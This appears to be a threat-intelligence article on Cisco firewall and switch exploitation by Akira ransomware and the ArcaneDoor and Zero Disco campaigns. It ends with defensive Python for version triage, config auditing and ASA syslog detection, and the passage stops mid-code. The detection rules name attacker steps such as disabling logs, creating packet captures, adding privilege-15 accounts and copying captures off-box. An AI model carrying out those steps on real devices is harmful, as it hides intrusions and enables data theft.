$244 Million in Ransoms, Chinese APT Groups, and Why Federal Agencies Can’t Keep Cisco Firewalls Patched

Executive Summary

While Fortinet and SonicWall have garnered attention for their exploitation crises, Cisco networking equipment—deployed in virtually every major enterprise, government agency, and critical infrastructure organization—has become ground zero for both Akira ransomware’s $244 million campaign and sophisticated Chinese nation-state espionage operations.

The scale of the problem is staggering:

  • Approximately 48,000 unpatched Cisco ASA/FTD appliances remain internet-facing as of November 2025
  • Akira ransomware has specifically weaponized multiple Cisco CVEs for initial access
  • Chinese-linked APT activity (UAT4356/Storm-1849) has been exploiting Cisco ASA/FTD zero-days since late 2023
  • Federal agencies themselves struggle to patch vulnerable Cisco devices, prompting emergency CISA directives
  • 60% of the incidents Cisco Talos responded to in 2024 involved identity-based attacks; VPN endpoints without MFA, very often Cisco ASA/AnyConnect, are a recurring way in

This isn’t theoretical. The Congressional Budget Office was breached through an unpatched Cisco firewall during the 2025 government shutdown. KNP Logistics, a 158-year-old company, was destroyed after Akira guessed a weak password on its Cisco VPN. The ArcaneDoor campaign deployed persistent malware on Cisco ASA devices that survives reboots and software upgrades.

The uncomfortable truth: Cisco’s ubiquity has made it the most valuable target in the ransomware ecosystem, and Akira has figured out exactly how to exploit it at scale.

The Akira-Cisco Connection: $244 Million and Counting

Akira’s Cisco-Focused Attack Strategy

Since emerging in March 2023, Akira ransomware has generated approximately $244.17 million in ransom proceeds as of September 2025, establishing itself as one of the most financially successful ransomware operations in history. What makes Akira particularly dangerous is its methodical targeting of Cisco products for initial access.

CISA’s November 2025 Updated Advisory specifically calls out Akira’s exploitation of multiple Cisco vulnerabilities:

Primary Cisco CVEs Exploited by Akira:

  • CVE-2020-3259 (CVSS 7.5) - Information disclosure in Cisco ASA/FTD (memory contents, including credentials, leaked from the web services interface)
  • CVE-2023-20269 (CVSS 5.0) - Unauthorized access to the remote access VPN (credential brute force and clientless SSL VPN session establishment)
  • CVE-2020-3580 (CVSS 6.1) - Cross-site scripting in the Cisco ASA/FTD web services interface

The advisory also lists CVE-2024-37085 (CVSS 6.8), but that is an authentication bypass in VMware ESXi's Active Directory integration, not a Cisco bug; it belongs with the non-Cisco CVEs covered below.

The Attack Pattern:

  • Reconnaissance: Scan internet for exposed Cisco VPN endpoints
  • Initial Access: Exploit unpatched CVE or brute-force weak credentials
  • MFA Bypass: Use sophisticated VPN-specific techniques (push notification fatigue, session hijacking)
  • Privilege Escalation: Leverage Cisco-specific misconfigurations
  • Lateral Movement: Use RDP, AnyDesk, LogMeIn from compromised Cisco device
  • Data Exfiltration: Complete in as little as 2 hours from initial access
  • Encryption: Deploy Akira_v2 ransomware with .akira or .powerranges extension


Real-World Impact: The KNP Logistics Case Study

The 2023 collapse of KNP Logistics Group (operator of the Knights of Old haulage business), which followed a June 2023 Akira attack, illustrates Akira’s Cisco exploitation strategy:

Company Profile:

  • Founded: 1865 (158 years of continuous operation at the time of the attack)
  • Industry: Transportation and logistics
  • Employees: 730 staff members
  • Status: One of the UK’s largest privately owned logistics groups

Attack Vector:

  • Akira exploited a weak password on a Cisco VPN account (no MFA enabled)
  • Brute-force attack successfully compromised employee credentials
  • Attackers gained access to Cisco ASA SSL VPN endpoint
  • Encrypted critical financial and operational systems

Outcome:

  • Company entered administration (British bankruptcy equivalent)
  • All 730 employees lost their jobs
  • 158-year-old business destroyed within months of the attack (administration followed in September 2023)
  • Director Paul Abbott revealed he couldn’t inform the employee whose password was compromised: “Would you want to know if it was you?”

Preventable Factors:

  • No multi-factor authentication on VPN
  • Weak password policy
  • Unpatched Cisco ASA vulnerabilities
  • No network segmentation
  • Inadequate backup strategy

Financial Reality:

  • Recovery costs exceeded available resources
  • Loss of customer confidence prevented business continuity
  • Already challenging market conditions made recovery impossible

This case demonstrates that Akira specifically targets small-to-medium enterprises (SMEs) with Cisco equipment and weak security postures—organizations that lack enterprise-level security teams but still deploy enterprise-grade Cisco infrastructure.

Akira’s Targeting Profile

According to our analysis of October 2025 ransomware campaigns, Akira demonstrated clear victim preferences:

Industry Focus:

  • Construction (primary target) - 35% of October victims
  • Manufacturing - 28% of October victims
  • Critical Infrastructure - 15%
  • Education - 10%
  • Retail and Technology - 12%

Geographic Distribution:

  • United States - 70% of victims
  • Italy - 10% (unusually high concentration)
  • United Kingdom - 8%
  • Other - 12%

Company Size:

  • Mid-sized companies ($10M-$500M revenue)
  • 100-5,000 employees
  • Companies that “build or fix something”
  • Organizations with Cisco networking equipment (ASA/FTD/VPN)

The Retro Aesthetic: Akira distinguishes itself with a 1980s-style “green screen” console interface on its Tor-based leak site, paying homage to the 1988 anime movie “Akira.” Victims must interact with the site using text commands, creating an unsettling juxtaposition between nostalgia and modern criminality.

The Audacity Factor: In one documented negotiation, after settling for $200,000 from a $600,000 demand, Akira provided the victim with a security checklist—essentially offering “post-attack advice” on how not to get hacked again. This demonstrates the group’s confidence and their understanding that weak Cisco configurations will continue providing targets.

The Chinese Threat: ArcaneDoor and Beyond

ArcaneDoor: The Most Sophisticated Cisco Exploit Campaign

In early 2024, Cisco discovered what would become known as ArcaneDoor—a sophisticated espionage campaign targeting Cisco ASA and Firepower Threat Defense (FTD) devices. Unlike ransomware operations focused on quick monetization, ArcaneDoor represents nation-state level capabilities aimed at long-term persistent access.

Attribution:

  • UAT4356 (Cisco Talos designation)
  • Storm-1849 (Microsoft designation)
  • Cisco Talos assessed the actor as state-sponsored without naming a country; subsequent reporting has linked the activity to China

Exploited Zero-Days:

  • CVE-2024-20353 (CVSS 8.6) - Web Services Denial-of-Service
  • CVE-2024-20359 (CVSS 6.0) - Persistent Local Code Execution

Malware Implants:

Line Dancer (In-Memory Backdoor):

  • Resides entirely in memory (fileless)
  • Executes arbitrary shellcode payloads

Capabilities:

  • Disable system logs to hide activity
  • Exfiltrate packet captures
  • Execute commands with root privileges
  • Evade detection by living in RAM only

Line Runner (Persistent HTTP-Based Lua Implant):

  • Installed by abusing CVE-2024-20359, a legacy ASA feature that unpacks and runs a Lua script from a ZIP archive on disk0: at boot; CVE-2024-20353 is used to force the reboot that triggers it
  • Survives reboots and software upgrades
  • HTTP-based command and control
  • Written in Lua
  • Patching stops the persistence mechanism from re-arming but does not remove an implant already on disk; Cisco published steps to check disk0: for it

Attack Sophistication:

  • Attackers disable logging to hide their tracks
  • Intercept CLI commands to monitor administrator activity
  • Intentionally crash devices to prevent diagnostic analysis
  • Use advanced evasion techniques to avoid detection
  • Maintain access through multiple firmware versions

Timeline:

  • July to August 2023: UAT4356 develops and tests its infrastructure
  • November 2023 to January 2024: Intrusions occur; Cisco is alerted by a customer in early 2024
  • April 24, 2024: Cisco publicly discloses ArcaneDoor
  • September 2025: Campaign continues with evolved techniques

September 2025: Continued Attacks Against Federal Agencies

The ArcaneDoor threat actor has not stopped. In September 2025, Cisco confirmed ongoing attacks exploiting new vulnerabilities:

CVE-2025-20333 (CVSS 9.9 - Critical):

  • Remote code execution as root via crafted HTTP requests to the VPN web server
  • On its own it requires valid VPN user credentials, which is why attackers chain it with CVE-2025-20362
  • Affects Cisco ASA and FTD platforms

CVE-2025-20362 (CVSS 6.5 - Medium):

  • Authentication bypass: unauthenticated access to restricted URL endpoints on the VPN web server
  • Chained with CVE-2025-20333 to get unauthenticated root code execution

CISA Emergency Directive 25-03 (Issued September 25, 2025):

  • Ordered all federal civilian agencies to immediately address vulnerabilities
  • Required agencies to report patching status
  • Agencies had roughly 24 hours to identify affected devices, collect and submit core dumps, and report, one of the tightest timelines in CISA emergency directive history

The Federal Patching Failure: In November 2025, CISA issued a stunning follow-up warning: Federal agencies were not patching vulnerable Cisco devices sufficiently.

CISA’s analysis revealed that devices marked as “patched” in agency reports were actually updated to software versions that were still vulnerable. This represents a catastrophic breakdown in federal cybersecurity operations—agencies thought they had patched but actually remained exposed.

Exploitation Activity:

Palo Alto Networks Unit 42 observed scanning/exploitation targeting:

  • 12 IP addresses at federal agencies
  • 11 IP addresses at state/local government
  • Government IPs in: India, Nigeria, Japan, Norway, France, UK, Netherlands, Spain, Australia, Poland, Austria, UAE, Azerbaijan, Bhutan

The Scale:

  • Approximately 48,000 unpatched Cisco ASA/FTD appliances remain internet-facing
  • Active exploitation confirmed within days of patch releases
  • State-sponsored attackers have months of head start due to federal patching failures

The Congressional Budget Office Breach

Perhaps the most embarrassing Cisco-related breach occurred at the Congressional Budget Office during the 2025 government shutdown.

Timeline:

  • 2024: Actively exploited Cisco ASA vulnerabilities (ArcaneDoor) are disclosed and fixed; by later accounts the CBO firewall received no updates after 2024
  • October 1, 2025: Federal government shutdown begins, furloughing roughly two-thirds of CISA staff
  • October 2025: The CBO’s Cisco ASA firewall is still running 2024-era software
  • Late October 2025: Suspected Chinese state hackers breach the CBO through the unpatched firewall
  • November 2025: Breach discovered; warnings issued to congressional staff

Key Details:

  • Security researcher Kevin Beaumont identified that the CBO was running an old, unpatched Cisco ASA firewall
  • The firewall had known critical vulnerabilities
  • Government shutdown suspended routine patching and maintenance
  • Suspected Chinese government hackers exploited the unpatched system
  • CBO stated they “took immediate action to contain” but warnings suggest containment remains incomplete

Why This Matters:

  • The Congressional Budget Office analyzes federal budgets and economic impacts; compromise provides insight into:
    • US budget priorities
    • Defense spending plans
    • Economic forecasting
    • Legislative strategies
  • Demonstrates that even Congress itself cannot keep Cisco devices patched

Operation Zero Disco: SNMP Rootkit Campaign

In October 2025, Trend Micro uncovered Operation Zero Disco, an active campaign exploiting a Cisco SNMP vulnerability to deploy Linux rootkits on IOS XE switches.

CVE-2025-20352 (CVSS 7.7 - High):

  • Stack overflow in the SNMP subsystem of IOS and IOS XE
  • Denial of service with a valid SNMPv1/v2c read-only community string or SNMPv3 credentials; remote code execution as root additionally requires administrative (privilege 15) credentials
  • Affects Cisco Catalyst 9400, 9300 and legacy 3750G series switches
  • Both 32-bit and 64-bit builds affected

Attack Technique:

  • Exploit Cisco SNMP vulnerability
  • Deploy Linux rootkit onto switch
  • Set universal password containing the word “disco” (one-letter change from “cisco”)
  • Install hooks into IOSd memory space
  • Fileless: the hooks live only in IOSd memory and are lost on reboot
  • Maintain unauthorized access for as long as the switch stays up, which for core switches can be years

Evasion Mechanisms:

  • Attackers use spoofed IPs and MAC addresses
  • Newer switches have ASLR which reduces success rate
  • Repeated attempts eventually succeed
  • Telnet vulnerability (modified CVE-2017-3881) used to enable memory access

Impacted Devices:

  • Cisco Catalyst 9400 Series
  • Cisco Catalyst 9300 Series
  • Cisco Catalyst 3750G Series (legacy, no longer supported)

Why “Disco”? Trend Research believes the universal password containing “disco” is a one-letter mockery of “cisco”—the attackers are quite literally taunting the vendor while compromising their devices.

Cisco’s Identity Crisis: 60% of 2024 Breaches

The Shift from Exploitation to Valid Credentials

According to Cisco Talos’s 2024 Year in Review, the cybersecurity landscape has fundamentally shifted:

60% of all cyber incidents in 2024 involved identity-based attacks.

What This Means:

  • Attackers are no longer relying primarily on exploiting software vulnerabilities
  • Instead, they’re using valid credentials to log in legitimately
  • Cisco VPN devices (ASA, FTD, AnyConnect) are a frequent target
  • Once attackers have valid credentials, they appear as legitimate users

Attack Phases Using Identity:

  • Initial Access (69% of ransomware attacks) - Stolen credentials
  • Privilege Escalation - Legitimate elevation using compromised admin accounts
  • Lateral Movement - Moving between systems as authenticated user
  • Persistence - Creating additional legitimate accounts

Targeted Systems:

  • Active Directory - 44% of identity-based incidents
  • Cloud APIs - 20% of identity-related compromises
  • VPN Services - Cisco ASA, FTD, AnyConnect primary vectors

How Credentials Are Stolen:

  • Infostealers (IBM X-Force reported an 84% increase in infostealer delivery via phishing in 2024)
  • Phishing campaigns targeting VPN users
  • Brute-force attacks against exposed VPN endpoints
  • MFA fatigue (push notification bombardment)
  • Initial Access Brokers selling pre-compromised credentials

The Cisco Connection: Cisco VPN products (ASA SSL VPN, AnyConnect) are deployed at most large organizations. When Akira or other ransomware groups target “VPN services without MFA,” the endpoint is very often a Cisco appliance, with SonicWall the other frequent target.

The 2022 Cisco Corporate Breach: A Case Study

In May 2022, Cisco itself was breached—ironically demonstrating the very identity-based attack vectors that would plague their customers.

Attackers (per Cisco Talos, an initial access broker with ties to):

  • UNC2447 cybercrime gang
  • Lapsus$ threat actor group
  • Yanluowang ransomware operators

Attack Vector:

  • Attacker gained control of Cisco employee’s personal Google account
  • Employee had saved work credentials in browser that synced to Google
  • Attacker conducted sophisticated voice phishing (vishing)
  • Impersonated “trusted organizations” to trick employee
  • Performed MFA push notification fatigue attack
  • Employee eventually accepted MFA push, granting VPN access
  • Attackers accessed Cisco’s internal network using legitimate credentials

Post-Compromise Activity:

  • Privilege escalation using offensive security tools (Mimikatz, Cobalt Strike)
  • Added backdoor accounts with administrative privileges
  • Installed persistence mechanisms
  • Gained access to credential databases and registry
  • Cleared system logs to hide tracks
  • Dropped backdoor payload communicating with C2 server

Outcome:

  • Attackers failed to deploy ransomware
  • Managed to exfiltrate 2.75 GB (3,100 files)
  • Yanluowang published stolen files on dark web
  • No impact to Cisco products or customer data (per Cisco)
  • Demonstrated that even Cisco struggles with identity-based attacks on their own infrastructure

Cisco’s CISA KEV Problem: How Many is Too Many?

While Fortinet has 20 CVEs and SonicWall has 14 on CISA’s Known Exploited Vulnerabilities catalog, Cisco has more than either, spread across IOS, IOS XE, ASA/FTD and management products, with new entries added regularly throughout 2024-2025.

Recent CISA KEV Additions:

2024 Major Additions

CVE-2024-20353 & CVE-2024-20359 (ArcaneDoor Campaign):

  • Added: April 24, 2024
  • Deadline: May 1, 2024
  • Context: Nation-state espionage campaign
  • Malware: Line Dancer, Line Runner
  • Impact: Persistent access surviving patches

CVE-2020-3259 (Akira Ransomware Exploitation):

  • Added: February 2024
  • Patched: May 2020 (4 years before KEV addition!)
  • Deadline: March 7, 2024
  • Context: Akira specifically targeting this CVE
  • Demonstrates attackers exploit old, unpatched vulnerabilities

CVE-2023-20269 (Akira Authentication Bypass):

  • Disclosed by Cisco: September 2023, while already under active exploitation
  • CVSS: 5.0
  • Context: Unauthorized access to the remote access VPN (credential brute force and clientless SSL VPN session establishment)
  • Used by Akira for initial VPN access

CVE-2024-20439 & CVE-2024-20440 (Smart Licensing Utility):

  • Added: March 31, 2025
  • CVSS: 9.8 (both Critical)
  • Deadline: April 21, 2025
  • Impact: CVE-2024-20439 is an undocumented static administrative credential; CVE-2024-20440 leaks that credential and other sensitive data through an exposed debug log file
  • Researchers described the static credential as, in effect, a backdoor
  • Exploitation attempts detected since January 2025 (SANS Internet Storm Center)

2025 Major Additions

CVE-2025-20333 & CVE-2025-20362 (Continued ArcaneDoor):

  • Added: September 25, 2025 (Emergency Directive 25-03)
  • CVSS: 9.9 and 6.5 (chained for unauthenticated root code execution)
  • Context: Same threat actor as ArcaneDoor
  • Federal agencies failed to patch properly
  • 48,000+ devices still vulnerable

CVE-2025-20352 (Operation Zero Disco):

  • Added: late September 2025, days after Cisco’s September 24 disclosure; Trend Micro’s Zero Disco report followed in October
  • CVSS: 7.7 (High)
  • Context: SNMP stack overflow used for rootkit deployment
  • “Disco” password mockery
  • Affects Catalyst 9400/9300 and legacy 3750G switches

CVE-2020-3580 (Added to Akira Advisory):

  • Added to CISA Akira advisory: November 2025
  • CVSS: 6.1
  • Context: XSS in Cisco ASA/FTD
  • Akira using for initial access

CVE-2024-37085 (Akira Authentication Bypass in VMware ESXi, not Cisco):

  • Added to CISA Akira advisory: November 2025
  • CVSS: 6.8
  • Context: ESXi hosts joined to Active Directory grant full administrative rights to any domain group named “ESX Admins”, so an attacker with enough domain rights can create that group and take over the hypervisor
  • Used by Akira after initial access to reach and encrypt virtual machines

Additional Akira-Exploited CVEs (Not Cisco, But Relevant)

CVE-2024-40711 (Veeam Backup & Replication):

  • Unauthenticated deserialization leading to remote code execution; Akira and Fog ransomware actively exploit it
  • Used after VPN compromise to reach the backup server and create rogue accounts ahead of encryption
  • CISA confirmed use in ransomware campaigns

The Pattern: Why Cisco Keeps Getting Hit

1. Ubiquity = Maximum Attack Surface

Cisco holds dominant market share across enterprise networking:

  • Cisco ASA/Firepower: one of the largest shares of the enterprise firewall market
  • Cisco AnyConnect VPN: Deployed at majority of Fortune 500
  • Cisco Switches/Routers: Backbone of internet infrastructure
  • Government Deployments: Standard issue for federal/state/local

Translation: Every ransomware group and nation-state actor has invested in developing Cisco exploits because compromising Cisco = compromising everything.

2. Legacy Equipment Still Running

Organizations continue running End-of-Life (EOL) Cisco equipment:

  • Cisco ASA 5500-X Series: Various models EOL between 2025-2026
  • Cisco Catalyst 3750G: No longer supported, still deployed
  • Ancient firmware versions: Organizations run years-old code

KNP Logistics ran unpatched Cisco ASA. Congressional Budget Office ran unpatched Cisco ASA since 2024. Pattern recognition is not difficult here.

3. Complexity Beyond Patching

Cisco devices require more than just applying patches:

  • Configuration hardening (disable Smart Install, Guest Shell, etc.)
  • Access control lists properly configured
  • SNMP community string rotation
  • TACACS+/RADIUS proper implementation
  • Management interface segmentation

Reality: Most organizations apply patches and call it done, leaving misconfigurations that attackers exploit.

4. The MFA Gap

Despite widespread MFA adoption, Cisco VPN deployments frequently lack proper MFA:

  • Legacy ASA/AnyConnect implementations without MFA
  • Push notification fatigue (attackers spam MFA requests until user accepts)
  • SMS-based MFA (vulnerable to SIM swapping)
  • Shared credentials across teams without proper RBAC

Akira specifically targets VPN services without MFA, which in practice most often means Cisco VPN deployments that never had MFA enabled.

5. The Zero-Day Problem

Cisco products are attractive targets for zero-day development:

  • ArcaneDoor used zero-days before patches existed
  • Operation Zero Disco exploited newly discovered SNMP vulnerabilities
  • Smart Licensing Utility had “backdoor” static credentials
  • Post-patch persistence techniques bypass remediation

Even patched systems can remain compromised if attackers achieved access before patching.

6. The Federal Government Can’t Keep Up

If CISA—the agency responsible for federal cybersecurity—issues an emergency directive and then discovers federal agencies failed to patch properly, what hope do SMBs have?

The Patching Crisis:

  • Government shutdown suspends patching operations
  • Agencies mark devices as “patched” when they’re not
  • 48,000 unpatched Cisco devices remain internet-facing
  • Chinese APT groups have months to exploit before remediation

What Organizations Must Do Now

Immediate Actions (This Week)

1. Emergency Cisco Device Inventory

Identify ALL Cisco networking equipment:

  • ASA firewalls
  • FTD appliances
  • AnyConnect VPN
  • Catalyst switches (especially 9400, 9300, 3750G)
  • Routers
  • Smart Licensing Utility installations

2. Critical Vulnerability Assessment

Cross-reference your equipment against actively exploited CVEs:

  • ArcaneDoor: CVE-2024-20353, CVE-2024-20359, CVE-2025-20333, CVE-2025-20362
  • Akira Ransomware (Cisco): CVE-2020-3259, CVE-2023-20269, CVE-2020-3580
  • Akira Ransomware (adjacent, non-Cisco): CVE-2024-37085 (VMware ESXi), CVE-2024-40711 (Veeam)
  • Operation Zero Disco: CVE-2025-20352
  • Smart Licensing Utility: CVE-2024-20439, CVE-2024-20440
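
Cross-referencing by hand is where the “patched but still vulnerable” mistake described earlier creeps in: an ASA upgraded from 9.16(4)40 to 9.16(4)67 looks patched in a spreadsheet, but if the first fixed release of the 9.16 train is later than that, it is still exposed. The Python below is an example added for this article, not Cisco or CISA code. It parses show version output, normalises ASA (9.16(4)67) and FTD (7.2.5) version strings into comparable tuples, and classifies each device against a per-train first-fixed table. The FIRST_FIXED values and the SAMPLE hostnames and builds are placeholders; fill the table from the First Fixed Release column of the advisory you are tracking, one entry per train, and add FTD trains separately.

```python
"""ASA/FTD version triage against a per-train 'first fixed release' table.

Added example for this article, not Cisco or CISA code. FIRST_FIXED and
SAMPLE are placeholders: fill the table from the Cisco advisory's
'First Fixed Release' column and SAMPLE from your own devices.
"""
import re
from dataclasses import dataclass

# ASA: 9.16(4)67 = major.minor(maintenance)interim.  FTD: 7.2.5 or 7.2.5.1.
_ASA_RE = re.compile(r"(\d+)\.(\d+)\((\d+)\)(\d+)?")
_FTD_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?")
_SHOW_VER_RE = re.compile(r"Version (\d[\d.()]*)")


def parse_version(text: str) -> tuple[int, ...]:
    """Normalise '9.16(4)67', '9.16(4)' or '7.2.5' to a 4-tuple of ints.

    A missing interim/patch number counts as 0, so 9.16(4) < 9.16(4)67.
    """
    m = _ASA_RE.search(text) or _FTD_RE.search(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(g) if g is not None else 0 for g in m.groups())


# PLACEHOLDER values, not taken from any Cisco advisory. Key = (major, minor)
# train; value = first release of that train containing the fix, or None
# when the train has no fix and the device must be migrated.
FIRST_FIXED = {
    (9, 12): None,
    (9, 16): (9, 16, 4, 85),
    (9, 18): (9, 18, 4, 67),
    (9, 20): (9, 20, 4, 10),
}


@dataclass
class Finding:
    host: str
    version: str
    status: str  # fixed | vulnerable | no-fix | unknown-train


def classify(version: tuple[int, ...]) -> str:
    train = version[:2]
    if train not in FIRST_FIXED:
        return "unknown-train"      # never silently pass an untracked train
    fixed = FIRST_FIXED[train]
    if fixed is None:
        return "no-fix"             # EOL train: migrate, do not 'patch'
    # An upgrade that stays below the first fixed build of the same train
    # is exactly the 'patched but still vulnerable' case CISA flagged.
    return "fixed" if version >= fixed else "vulnerable"


def triage(show_version_outputs: dict[str, str]) -> list[Finding]:
    """Map hostname -> raw 'show version' text into a list of findings."""
    findings = []
    for host, text in show_version_outputs.items():
        m = _SHOW_VER_RE.search(text)
        if not m:
            findings.append(Finding(host, "?", "unknown-train"))
            continue
        raw = m.group(1)
        findings.append(Finding(host, raw, classify(parse_version(raw))))
    return findings


# Constructed 'show version' fragments; hostnames and builds are invented.
SAMPLE = {
    "fw-edge-1": "Cisco Adaptive Security Appliance Software Version 9.16(4)67\n",
    "fw-edge-2": "Cisco Adaptive Security Appliance Software Version 9.16(4)85\n",
    "fw-legacy": "Cisco Adaptive Security Appliance Software Version 9.12(4)67\n",
    "fw-branch": "Cisco Adaptive Security Appliance Software Version 9.18(4)40\n",
    "ftd-dc-1":  "Model : Cisco Firepower Threat Defense for VMware (75) Version 7.2.5 (Build 208)\n",
}

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f.host:10} {f.version:12} {f.status}")
```

Anything on a train missing from the table comes back as unknown-train rather than passing quietly (the FTD device above, until an FTD entry is added), and a None entry marks the retire-and-replace case from step 3 below. Run it against a fresh export after every upgrade wave, not just once.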

3. Patch or Isolate

  • Apply all available Cisco security updates immediately
  • For EOL equipment: Retire and replace (no patches available)
  • For equipment that cannot be patched immediately: Isolate from internet
  • Remove internet-facing management interfaces

4. Mandatory MFA Enforcement

  • Enable MFA on ALL Cisco VPN access (ASA, AnyConnect)
  • Use phishing-resistant MFA (FIDO2, hardware tokens)
  • Eliminate SMS-based MFA
  • Implement MFA fatigue protections

5. Credential Rotation

  • Rotate all administrative credentials on Cisco devices
  • Change SNMP community strings
  • Update TACACS+/RADIUS shared secrets
  • Assume credentials have been compromised if devices were exposed

Short-Term Actions (This Month)

6. Configuration Hardening

Review and implement Cisco hardening guides:

  • Disable Cisco Smart Install feature
  • Disable Guest Shell (IOS XE)
  • Restrict VTY access (management interfaces)
  • Configure access control lists with explicit deny logging
  • Disable outbound connections from VTYs
  • Use Type 8 (PBKDF2-SHA-256) for credential storage
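
Most of these items are visible in the running-config, so the review can be scripted against a config export instead of eyeballed on each box. The Python below is an example added for this article, not Cisco’s hardening checker. It parses an IOS / IOS XE running-config into top-level lines and their indented children, then applies rules for Smart Install (no vstack), IOX/Guest Shell, the HTTP server, remote syslog, SNMP communities, type 0/5/7 credentials versus type 8, and VTY transport input, transport output and access-class. WEAK_CONFIG and HARDENED_CONFIG are constructed; the hostname, addresses, community strings and the $8$ hashes are invented.

```python
"""Audit an IOS / IOS XE running-config against the hardening items above.

Added example for this article, not Cisco code. WEAK_CONFIG and
HARDENED_CONFIG are constructed (hostnames, addresses, community strings
and $8$ hashes are invented). The rules use documented CLI syntax but are a
starting point, not a substitute for Cisco's hardening guide.
"""
import re


def parse_blocks(config: str):
    """Split a running-config into top-level lines and their indented children."""
    top, children, parent = [], {}, None
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw[0].isspace():
            children.setdefault(parent, []).append(raw.strip())
        else:
            parent = raw.rstrip()
            top.append(parent)
    return top, children


def audit(config: str) -> list[str]:
    top, children = parse_blocks(config)
    f = []
    if "no vstack" not in top:
        f.append("Smart Install not explicitly disabled: add 'no vstack'")
    if "iox" in top:
        f.append("IOX enabled, so Guest Shell is available: 'no iox' unless required")
    if any(l in ("ip http server", "ip http secure-server") for l in top):
        f.append("HTTP(S) server enabled: 'no ip http server' / 'no ip http secure-server'")
    if not any(l.startswith("logging host ") for l in top):
        f.append("no remote syslog destination: add 'logging host <collector>'")
    for l in top:
        if m := re.match(r"snmp-server community (\S+)(?: view \S+)? (RO|RW)\b", l, re.I):
            name, mode = m.groups()
            if mode.upper() == "RW":
                f.append(f"SNMP community '{name}' is read-write: remove it; use SNMPv3 authPriv")
            elif name.lower() in {"public", "private", "cisco"}:
                f.append(f"SNMP community '{name}' is a default/guessable string: rotate and ACL it")
            else:
                f.append(f"SNMPv1/v2c community '{name}' in use: prefer SNMPv3 with an ACL")
        elif m := re.match(r"username (\S+) .*?\b(?:password|secret) (\d) ", l):
            user, kind = m.groups()
            if kind in ("0", "7"):   # plaintext / Vigenere-style, trivially reversible
                f.append(f"user '{user}' stored with reversible type {kind}: re-enter as "
                         f"'username {user} algorithm-type sha256 secret <pw>' (type 8)")
            elif kind == "5":        # MD5-crypt
                f.append(f"user '{user}' stored as type 5 (MD5): re-enter with 'algorithm-type sha256 secret' (type 8)")
        elif l.startswith("enable password "):
            f.append("'enable password' in use: replace with 'enable algorithm-type sha256 secret <pw>'")
    for parent, lines in children.items():
        if not parent or not parent.startswith("line vty"):
            continue
        ti = [x for x in lines if x.startswith("transport input")]
        if ti != ["transport input ssh"]:
            f.append(f"{parent}: transport input is '{ti[0] if ti else 'default (all)'}', should be 'transport input ssh'")
        if "transport output none" not in lines:
            f.append(f"{parent}: add 'transport output none' to block outbound sessions from the VTY")
        if not any(x.startswith("access-class ") and x.endswith(" in") for x in lines):
            f.append(f"{parent}: no inbound 'access-class' limiting management sources")
    return f


# Constructed weak config: every value below is invented.
WEAK_CONFIG = """\
hostname core-sw-1
!
iox
!
enable password Sw1tchPass
username admin privilege 15 password 7 0822455D0A16
!
ip http server
!
snmp-server community public RO
snmp-server community n3tm0n RW
!
line vty 0 4
 transport input telnet ssh
 login local
line vty 5 15
 access-class 10 in
 transport input ssh
 transport output none
 login local
!
end
"""

# The same device with the hardening items applied (hashes are dummies).
HARDENED_CONFIG = """\
hostname core-sw-1
!
no vstack
no ip http server
no ip http secure-server
!
enable secret 8 $8$Yp3Kq8ZbFxm2lE$QzS0v7d4TnWc1eL9hB6uAyR3kGfJ5oM8xP2wN4iV7tD
username netops privilege 15 secret 8 $8$h9pE6Yv0T2fFQD$Jx5p2mT1c9Rv4oQ8bZw3nL7aK0yU6eH2gS5dF1iV8tW
!
logging host 10.10.0.50
!
ip access-list standard MGMT
 permit 10.10.0.0 0.0.0.255
!
snmp-server group NETMON v3 priv access MGMT
snmp-server user monitor NETMON v3 auth sha Str0ngAuthKey priv aes 128 Str0ngPrivKey
!
line vty 0 15
 access-class MGMT in
 transport input ssh
 transport output none
 login local
!
end
"""

if __name__ == "__main__":
    for finding in audit(WEAK_CONFIG):
        print("-", finding)
    print("hardened findings:", audit(HARDENED_CONFIG))
```

The rules are IOS / IOS XE syntax (Catalyst switches and routers, the Zero Disco targets); ASA stores credentials and VTY restrictions differently and needs its own rule set. Note the weak config’s second VTY range passes while the first fails: auditing per line block is what catches the half-hardened device.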

7. Detection and Monitoring

Deploy network detection tools looking for:

  • Unusual SNMP activity
  • Packet capture creation on devices
  • SPAN/ERSPAN session definitions
  • FTP/SFTP transfers from network devices
  • Changes to VTY access configuration
  • ArcaneDoor indicators (Line Dancer, Line Runner)
  • Creation of unexpected administrative accounts
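
Several of these map directly onto ASA syslog: 113005 records rejected VPN/AAA authentications, 111008 records every CLI command an administrator runs (so capture, no logging, username ... privilege 15 and copy ... ftp: all leave a trace), and 605005 records management logins with their source address. The Python below is an example added for this article, not a Cisco or CISA detection. It runs those rules over a handful of constructed log lines (hostnames, users and addresses invented) and flags a password spray against the VPN, an admin login from outside the management subnet, and the ArcaneDoor-style sequence of disabling logging, starting a capture, adding a privilege-15 user and copying the capture off-box. MGMT_NET and the brute-force threshold are assumptions to tune for your environment.

```python
"""Detection over Cisco ASA syslog: VPN brute force / password spraying,
sensitive CLI commands, and admin logins from outside the management net.

Added example for this article, not Cisco or CISA code. Message IDs 113005,
111008 and 605005 are real ASA syslog IDs; the log lines, hostnames, users
and addresses are constructed. MGMT_NET and the thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

MGMT_NET = ip_network("10.10.0.0/24")   # assumed management subnet
BRUTE_THRESHOLD = 5                      # failed logins per source IP ...
BRUTE_WINDOW = timedelta(minutes=2)      # ... within this window

_TS = re.compile(r"^(\w{3} \d{2} \d{4} \d{2}:\d{2}:\d{2})")
# %ASA-6-113005: AAA user authentication Rejected : reason = ... : user = X : user IP = Y
_FAIL = re.compile(r"%ASA-6-113005: .*?user = (\S+) : user IP = (\S+)")
# %ASA-5-111008: User 'X' executed the 'Y' command.
_CMD = re.compile(r"%ASA-5-111008: User '([^']+)' executed the '(.+)' command\.")
# %ASA-6-605005: Login permitted from SRC/PORT to IFACE:IP/PROTO for user "X"
_LOGIN = re.compile(r"%ASA-6-605005: Login permitted from (\S+)/\d+ to (\S+) for user [\"']?([\w.@-]+)")

SENSITIVE_CMDS = [
    (re.compile(r"^capture\s"), "packet capture created"),
    (re.compile(r"^no logging"), "logging disabled"),
    (re.compile(r"^clear logging"), "log buffer cleared"),
    (re.compile(r"^username .*\bprivilege 15\b"), "privilege-15 account added"),
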